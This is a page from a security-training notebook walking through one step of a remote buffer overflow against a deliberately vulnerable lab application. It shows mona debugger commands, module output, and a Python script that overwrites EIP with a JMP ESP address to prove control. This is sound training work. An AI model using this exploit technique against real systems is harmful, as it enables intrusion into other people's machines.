LogoLogo
  • 🤩Welcome!
  • Buffer overflow
    • Remote Buffer Overflow
      • Crashing the Application
      • Controlling the EIP
      • Finding Bad Characters
      • Finding a Return Address
      • Generating Shellcode
      • Getting a Shell
  • Wireless Penetration Testing
    • Wifi Pineapple - Tetra
      • Setup
      • Firmware Upgrade
      • Capturing Wireless Handshake
      • Cracking WPA2 Handshake
      • PineAP
      • Modules
  • PortSwigger Labs
    • Authentication
      • Username enumeration via different responses
      • Username enumeration via subtly different responses
      • Username enumeration via response timing
  • TryHackMe
    • 🎄Advent of Cyber 3 (2021)
      • [Day 1] Save The Gifts
      • [Day 2] Elf HR Problems
      • [Day 3] Christmas Blackout
      • [Day 4] Santa's Running Behind
      • [Day 5] Pesky Elf Forum
      • [Day 6] Patch Management Is Hard
      • [Day 7] Migration Without Security
      • [Day 8] Santa's Bag of Toys
      • [Day 9] Where Is All This Data Going
  • Google Cloud Computing
    • ☁️Cloud Computing Fundamentals
      • Getting Started with Cloud Shell and gcloud
      • Creating a Virtual Machine
      • App Engine: Qwik Start - Python
      • Cloud Functions: Qwik Start - Command Line
      • Kubernetes Engine: Qwik Start
      • Set Up Network and HTTP Load Balancers
Powered by GitBook
On this page
  • Listing all modules
  • Analyzing Output
  • Locating OpCode syscall
  • Generating OpCode
  • Finding JMP ESP
  • Hitting Offset
  • Setting breakpoint
  • returnAddress.py
  • Hitting breakpoint

Was this helpful?

  1. Buffer overflow
  2. Remote Buffer Overflow

Finding a Return Address

This Return Address would be written in the EIP and used to direct the application to where our payload will be located! Mona.py would be used for this as well.

PreviousFinding Bad CharactersNextGenerating Shellcode

Last updated 3 years ago

Was this helpful?

Listing all modules

The following command returns a bunch of programs/dependencies that our software in question uses/calls when operating. We notice that one of them has no memory protection or whatsoever. This would be useful for the process.

!mona modules

Analyzing Output

Log data, item 12
 Address=0BADF00D
 Message= 0x62500000 | 0x62508000 | 0x00008000 | False  | False   | False |  False   | False  | -1.0- [essfunc.dll] (C:\Users\admin\Desktop\vulnapps\oscp\essfunc.dll)

Searching through the output, essfunc.dll seems to have most of the protections turned off which would allow for this attack to go through.

Locating OpCode syscall

Generating OpCode

The next step would be to generate the opt code for “JMP ESP” so that we can look for it in essfunc.dll. We will be using msf-nasm_shell for this.

msf-nasm_shell

Finding JMP ESP

!mona find -s "\xff\xe4" -m "essfunc.dll"
Log data, item 11
 Address=625011AF
 Message=  0x625011af : "\xff\xe4" |  {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnapps\oscp\essfunc.dll)

0x625011AF

Hitting Offset

Now that we have an offset, we can try setting a breakpoint and hitting to verify that we have full control.

Setting breakpoint

Then, hit F2 to set the breakpoint

returnAddress.py

#!/usr/bin/python
import socket

try:
    print ("\nSending evil buffer...")
    
    prefix = "OVERFLOW10 "
    filler = "A" * 537 
    eip = "\xaf\x11\x50\x62" #0x625011AF
    buffer = prefix + filler + eip

    s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)

    s.connect(("windows.box", 1337))
    s.send(buffer)

    s.close()

    print ("\nDone!")
  
except:
    print ("\nCould not connect!")

Hitting breakpoint

python returnAddress.py

Our debugger shows that we did hit the JMP ESP and hit the breakpoint that we set previously.